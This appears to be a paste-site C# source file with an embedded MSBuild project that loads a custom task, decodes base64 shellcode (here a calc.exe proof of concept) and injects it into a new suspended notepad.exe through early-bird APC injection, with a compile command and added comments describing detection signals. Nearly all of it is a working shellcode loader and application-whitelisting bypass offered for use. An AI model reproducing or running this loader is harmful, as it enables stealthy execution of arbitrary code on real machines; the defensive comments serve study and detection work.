hollerith

AllIDoIsWin by @subTee

Jan 14th, 2020
  1. /*
  2. <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3.             <Target Name="MyTarget">
  4.                 <SimpleTask MyProperty="My voice is my passport."
  5.                 MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
  6.                 MyProcess="C:\Windows\notepad.exe"/>
  7.             </Target>
  8.         <UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />
  9.     </Project>
  10. */
  11.  
  12. using System;
  13. using System.Diagnostics;
  14. using System.Reflection;
  15.  
  16. using System.Runtime.InteropServices;
  17.  
  18. using Microsoft.Build.Framework;
  19. using Microsoft.Build.Utilities;
  20.  
  21.  
  22. // C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.Tasks.v4.0.dll";"Microsoft.Build.Utilities.v4.0.dll" /target:library C:\Users\mobile\AllIDoIsWinWinWin.cs
  23.  
  24. namespace MyTasks
  25. {
    /// <summary>
    /// MSBuild task loaded through the UsingTask element shown in the project-file comment at the top
    /// of this file. Execute() echoes MyProcess and MyProperty to the console and then hands MyCode
    /// (base64 text) and MyProcess (an executable path) to ApcInjectionNewProcess.Exec, which decodes
    /// MyCode and runs the bytes inside a new, initially suspended instance of MyProcess. The return
    /// value is always true, so the build reports success whether or not Exec's Win32 calls succeeded.
    /// </summary>
    /// <remarks>
    /// Defensive note: this is the "custom MSBuild task" execution pattern — the build host loads
    /// whatever task assembly UsingTask names and runs its Execute() with the build user's privileges.
    /// The observable for monitoring is the build host loading a non-Microsoft task DLL and then
    /// spawning the executable named in MyProcess; the Console.WriteLine calls also leave the
    /// configured path and property in the build output.
    /// </remarks>
    public class SimpleTask : Task
    {
        /// <summary>Called by MSBuild when the owning target runs.</summary>
        /// <returns>Always true; nothing inside Exec is checked or surfaced to the build.</returns>
        public override bool Execute()
        {
           
           
            Console.WriteLine(this.MyProcess);
            Console.WriteLine(this.MyProperty);
            // MyCode is base64-decoded and executed in a new instance of MyProcess (see Exec below).
            ApcInjectionNewProcess.Exec(this.MyCode,this.MyProcess);
           
            return true;
        }
 
 
        // Populated by MSBuild from the attributes on the task element (see the project-file comment above).
        public string MyProperty { get; set; }   // only echoed to the console
        public string MyCode { get; set; }       // base64-encoded bytes handed to Exec; not validated here
        public string MyProcess { get; set; }    // path of the executable Exec creates
       
 
    }
  46. }
  47.  
  48.  
/// <summary>
/// Starts a new process in the suspended state, copies a base64-decoded byte buffer into it, changes
/// the buffer's protection from read-write to execute-read and queues the buffer's address as a
/// user-mode APC on the new process's primary thread before resuming it. This is the well-documented
/// "early bird" APC injection sequence.
/// </summary>
/// <remarks>
/// Defensive note: the signal is the sequence rather than any single call — CreateProcess with
/// CREATE_SUSPENDED, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx (RW -> RX), QueueUserAPC,
/// ResumeThread, all against a freshly created child. The author's own comment on
/// PAGE_EXECUTE_READWRITE shows the RW-then-RX protection change is deliberate, so telemetry that
/// only flags RWX allocations misses this; protection changes on remote process memory deserve the
/// same attention as allocations. No return value is checked and no handle is closed anywhere in
/// this class.
/// </remarks>
public class ApcInjectionNewProcess
{
    /// <summary>
    /// Decodes <paramref name="a"/> from base64 and runs the resulting bytes inside a new instance of
    /// the executable at <paramref name="b"/>.
    /// </summary>
    /// <param name="a">Base64 text; Convert.FromBase64String throws FormatException if it is malformed.</param>
    /// <param name="b">Path passed as lpApplicationName to CreateProcess; no command line, no working
    /// directory and no explicit environment are supplied.</param>
    /// <remarks>
    /// Every Win32 result below (success, resultPtr, resultBool, sht, ptr) is assigned and never
    /// inspected, so a failed step still falls through to ResumeThread and the caller
    /// (SimpleTask.Execute) reports success regardless. pi.hProcess, pi.hThread and sht are never
    /// closed.
    /// </remarks>
    public static void Exec(string a, string b)
    {  
        byte[] shellcode = System.Convert.FromBase64String(a);
       
       
       
        // Target process to inject into
        string processpath = b;//@"C:\Windows\notepad.exe";
        STARTUPINFO si = new STARTUPINFO();   // si.cb is left at 0; Win32 expects sizeof(STARTUPINFO)
        PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
       
        // Create new process in suspended state to inject into
        // CREATE_SUSPENDED: the primary thread exists but has not yet started the image's entry point.
        bool success = CreateProcess(processpath, null,
            IntPtr.Zero, IntPtr.Zero, false,
            ProcessCreationFlags.CREATE_SUSPENDED,
            IntPtr.Zero, null, ref si, out pi);
       
        // Allocate memory within process and write shellcode
        // Allocated read-write only; made executable further down after the write completes.
        IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
        IntPtr bytesWritten = IntPtr.Zero;
        bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
       
        // Open thread
        // THREAD_SET_CONTEXT is the access right QueueUserAPC requires on the target thread handle.
        IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
        uint oldProtect = 0;
       
        // Modify memory permissions on allocated shellcode
        // RW -> RX; the buffer is never RWX (see the author's note on PAGE_EXECUTE_READWRITE below).
        resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
       
        // Assign address of shellcode to the target thread apc queue
        // The buffer address is queued as the APC routine itself. A user-mode APC runs when the thread
        // next enters an alertable state; for a thread resumed from CREATE_SUSPENDED that is commonly
        // during process start-up, before the image's own entry point executes.
        IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
       
        IntPtr ThreadHandle = pi.hThread;
        ResumeThread(ThreadHandle);
       
    }
   
   
    // Win32 allocation / protection constants. Declared as mutable statics rather than const.
    private static UInt32 MEM_COMMIT = 0x1000;
 
    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR  ;-)
    private static UInt32 PAGE_READWRITE = 0x04;
    private static UInt32 PAGE_EXECUTE_READ = 0x20;
   
   
    // Used only by the OpenProcess declaration below, which Exec does not call.
    [Flags]
    public enum ProcessAccessFlags : uint
    {
        All = 0x001F0FFF,
        Terminate = 0x00000001,
        CreateThread = 0x00000002,
        VirtualMemoryOperation = 0x00000008,
        VirtualMemoryRead = 0x00000010,
        VirtualMemoryWrite = 0x00000020,
        DuplicateHandle = 0x00000040,
        CreateProcess = 0x000000080,
        SetQuota = 0x00000100,
        SetInformation = 0x00000200,
        QueryInformation = 0x00000400,
        QueryLimitedInformation = 0x00001000,
        Synchronize = 0x00100000
    }
   
    // dwCreationFlags values for CreateProcess; Exec passes only CREATE_SUSPENDED.
    [Flags]
    public enum ProcessCreationFlags : uint
    {
        ZERO_FLAG = 0x00000000,
        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
        CREATE_NEW_CONSOLE = 0x00000010,
        CREATE_NEW_PROCESS_GROUP = 0x00000200,
        CREATE_NO_WINDOW = 0x08000000,
        CREATE_PROTECTED_PROCESS = 0x00040000,
        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
        // NOTE(review): duplicates CREATE_SHARED_WOW_VDM; Win32 defines CREATE_SEPARATE_WOW_VDM as 0x00000800.
        CREATE_SEPARATE_WOW_VDM = 0x00001000,
        CREATE_SHARED_WOW_VDM = 0x00001000,
        CREATE_SUSPENDED = 0x00000004,
        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
        DEBUG_PROCESS = 0x00000001,
        DETACHED_PROCESS = 0x00000008,
        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
        INHERIT_PARENT_AFFINITY = 0x00010000
    }
    // Filled in by CreateProcess. Both handles are used by Exec and neither is closed.
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
    }
    // Passed to CreateProcess zero-initialised (Exec never sets cb or any other field).
    // wShowWindow and cbReserved2 are WORD in Win32; short is the same width, so layout is unaffected.
    public struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }
   
    // Thread access rights for OpenThread; Exec requests SET_CONTEXT only.
    [Flags]
    public enum    ThreadAccess : int
    {
        TERMINATE           = (0x0001)  ,
        SUSPEND_RESUME      = (0x0002)  ,
        GET_CONTEXT         = (0x0008)  ,
        SET_CONTEXT         = (0x0010)  ,
        SET_INFORMATION     = (0x0020)  ,
        QUERY_INFORMATION       = (0x0040)  ,
        SET_THREAD_TOKEN    = (0x0080)  ,
        IMPERSONATE         = (0x0100)  ,
        DIRECT_IMPERSONATION    = (0x0200)
    }
   
    // P/Invoke declarations. Exec uses OpenThread, WriteProcessMemory, QueueUserAPC, VirtualAllocEx,
    // CreateProcess, ResumeThread and VirtualProtectEx; VirtualAlloc, OpenProcess and SuspendThread
    // are declared but not referenced in this file.

    // dwThreadId is declared int; Exec casts the uint from PROCESS_INFORMATION down to it.
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
        int dwThreadId);
   
    [DllImport("kernel32.dll",SetLastError = true)]
    public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        int nSize,
        out IntPtr lpNumberOfBytesWritten);
   
    // Win32 QueueUserAPC returns DWORD (non-zero on success); it is declared here as IntPtr and the
    // result is discarded by Exec anyway.
    [DllImport("kernel32.dll")]
    public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
   
    // Not used by Exec. lpStartAddr is declared UInt32, which cannot hold a 64-bit address.
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
         Int32 size, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32.dll", SetLastError = true )]
    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
    Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
   
    // Not used by Exec (the process handle comes from CreateProcess, not OpenProcess).
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(
     ProcessAccessFlags processAccess,
     bool bInheritHandle,
     int processId
    );
   
   
    // No CharSet is given, so this binds to the ANSI CreateProcessA; no SetLastError either, so a
    // failure leaves no retrievable error code.
    [DllImport("kernel32.dll")]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    [DllImport("kernel32.dll")]
    public static extern uint ResumeThread(IntPtr hThread);
    // Not used by Exec.
    [DllImport("kernel32.dll")]
    public static extern uint SuspendThread(IntPtr hThread);
    [DllImport("kernel32.dll")]
    public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
    int dwSize, uint flNewProtect, out uint lpflOldProtect);
}